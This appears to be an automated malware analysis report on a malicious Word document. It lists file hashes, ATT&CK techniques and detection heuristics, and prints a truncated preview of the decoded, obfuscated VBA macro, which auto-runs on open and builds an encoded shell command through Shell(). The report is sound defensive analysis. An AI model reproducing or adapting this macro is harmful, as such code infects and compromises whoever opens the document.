Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d04a005ce00c87c7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 128.2 KB
Created: 2018-06-21 21:26:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: d72af623810ff06ea20289ead791dde1
SHA-1: 9e517d97039af0d0d35e70e8c55719b685f1c3bf
SHA-256: d04a005ce00c87c70331ca6a2acdf30cfb7a75a78c90dcc1241c7cdc800d7d0a
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. Specifically, it constructs the string "Hello ""$("seT-iTem" which, when combined with other obfuscated parts, likely aims to download and execute a second-stage payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                 | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)    | 29477 bytes
SHA-256: adee51fe4b0324eebb6e9a6d27276a0af500c479bf96df642c2baf6187a7412f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "JLjwIwT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VvbKQSoPO"
Function VWXGBdSiY()
On Error Resume Next
LpmzjI = (EwHJfQ * 42662 + 22629 * CInt(jBiwt - CDbl(12902)) * 3543 * Oct(93715))
jliMVahwhBN = "He" + "ll" + " " + Chr(34) + "$(" + "seT" + "-iT" + "em"
ODjqdX = (Xwsir * 53517 + 80832 * CInt(hXHSR - CDbl(16155)) * 79635 * Oct(92720))
iGvbivs = " 'v" + "ar" + "iAb" + "lE:"
ukwYwi = (opXUF * 30999 + 27568 * CInt(kEHSd - CDbl(64140)) * 43185 * Oct(9626))
aJIrw = "OfS" + "' " + "'')"
VWXGBdSiY = jliMVahwhBN + iGvbivs + aJIrw
PPVwi = (TZHzwt * 51509 + 63657 * CInt(PnqBDV - CDbl(25775)) * 33653 * Oct(17498))
End Function
Function VNEWOVScjV()
On Error Resume Next
iNAXSE = (fkIhN * 12044 + 9884 * CInt(EvwSS - CDbl(47970)) * 17994 * Oct(45587))
JtMJncd = Chr(34) + "+ " + "[st" + "RIN" + "G]" + "('" + "32"
CprVBq = (zMJAR * 36117 + 4337 * CInt(sYOqYt - CDbl(4506)) * 64276 * Oct(71492))
BZvflLRqz = "J70" + "M75" + "M1" + "19Z" + "96G" + "80"
zZOwrQ = (pTUdN * 5268 + 57643 * CInt(GjAwEt - CDbl(72596)) * 86643 * Oct(19971))
ISEIn = "A1" + "04" + "Z3" + "6<5" + "7J" + "36" + "!10"
tKTzmA = (FiBQn * 98178 + 41303 * CInt(acwhKf - CDbl(41766)) * 70223 * Oct(92669))
vEWUtj = "6x9" + "7!1" + "15" + "K4"
KBkjw = (jEYzF * 11950 + 81195 * CInt(UVHXcd - CDbl(37300)) * 70285 * Oct(60087))
UJotZ = "1!1" + "07M" + "10" + "2<1" + "10" + "<9" + "7J"
iRmLz = (XZWhcw * 44894 + 49229 * CInt(ojiaXn - CDbl(39686)) * 73153 * Oct(34209))
mqXDJoso = "10" + "3<1" + "12!" + "36"
pXzIS = (ZWhCfa * 40997 + 9522 * CInt(ZfjIEV - CDbl(95713)) * 65438 * Oct(79958))
EioKoJizDbm = "d1" + "18K" + "101"
VNEWOVScjV = JtMJncd + BZvflLRqz + ISEIn + vEWUtj + UJotZ + mqXDJoso + EioKoJizDbm
tkKHPJ = (VwJXZR * 7870 + 66703 * CInt(cpXCN - CDbl(27961)) * 57114 * Oct(93520))
End Function
Function PTmil()
On Error Resume Next
HldNrr = (IUZNPP * 34508 + 86109 * CInt(FWvGz - CDbl(27408)) * 59883 * Oct(50563))
PiAbUGmPdfj = "!10" + "6!9" + "6K"
tIKma = (HNIIYC * 14775 + 14466 * CInt(hRziU - CDbl(76041)) * 25191 * Oct(45696))
ZjzzjqXlwAm = "107" + "J1" + "05d" + "63" + "x32" + "x8" + "6!8"
CHripw = (GCMzji * 41297 + 87203 * CInt(GCGJUw - CDbl(95974)) * 29334 * Oct(56114))
KHwCCwpw = "7J" + "11" + "0A1"
iQAFN = (kjkSnY * 45224 + 19951 * CInt(RzvKi - CDbl(4870)) * 92537 * Oct(8111))
DwhavCJ = "26" + "K11" + "0<" + "36d" + "57" + "K36"
OlGNJE = (cFQQc * 11093 + 94908 * CInt(QzwkaH - CDbl(65997)) * 58749 * Oct(91859))
wmrXsa = "M1" + "06" + "Z9" + "7J"
DwCEvW = (MQrcZW * 42608 + 62267 * CInt(KTGtm - CDbl(23056)) * 3815 * Oct(94312))
pLWPFVihsGF = "11" + "5x4" + "1Z1" + "07" + "d1"
iDLdcf = (LSGFH * 45236 + 19808 * CInt(iQpGWq - CDbl(56124)) * 55425 * Oct(8836))
fjuqLDz = "02K" + "110" + "K97" + "!10" + "3!1"
PTmil = PiAbUGmPdfj + ZjzzjqXlwAm + KHwCCwpw + DwhavCJ + wmrXsa + pLWPFVihsGF + fjuqLDz
wPXBI = (wFLMTa * 66609 + 76457 * CInt(VODPb - CDbl(3080)) * 75194 * Oct(16780))
End Function
Function vLKLUEfK()
On Error Resume Next
PVWva = (FaGMf * 31723 + 67492 * CInt(JPICM - CDbl(95500)) * 52125 * Oct(6909))
sJjjbENVQG = "12A" + "36<" + "87" + "J12"
BuAcZN = (PJGLmm * 39184 + 1905 * CInt(IHsUWH - CDbl(90437)) * 73507 * Oct(9970))
VMrwj = "5Z1" + "19" + "Z1" + "12d"
zSzaLl = (oVBZa * 60795 + 25414 * CInt(wWJXWX - CDbl(91283)) * 14052 * Oct(45358))
NPLFu = "97" + "G10" + "5Z4" + "2x7"
qijLt = (OXjOKQ * 66893 + 91369 * CInt(awzzE - CDbl(65688)) * 53306 * Oct(59851))
ikuQD = "4d9" + "7M1" + "12"
ZllOiW = (LbXUC * 54972 + 55761 * CInt(BLDzzS - CDbl(62766)) * 75750 * Oct(27711))
NOGpcLpraEz = "K42" + "x83" + "G9" + "7Z" + "102"
vLKLUEfK = sJjjbENVQG + VMrwj + NPLFu + ikuQD + NOGpcLpraEz
wYwHSV = (DsmHO * 480 + 78747 * CInt(KwoLa - CDbl(44600)) * 96038 * Oct(41360))
End Function
Function oMmsfmftVa()
On Error Resume Next
zticf = (swWQl * 95997 + 15079 * CInt(IBGzk - CDbl(82285)) 
... (truncated)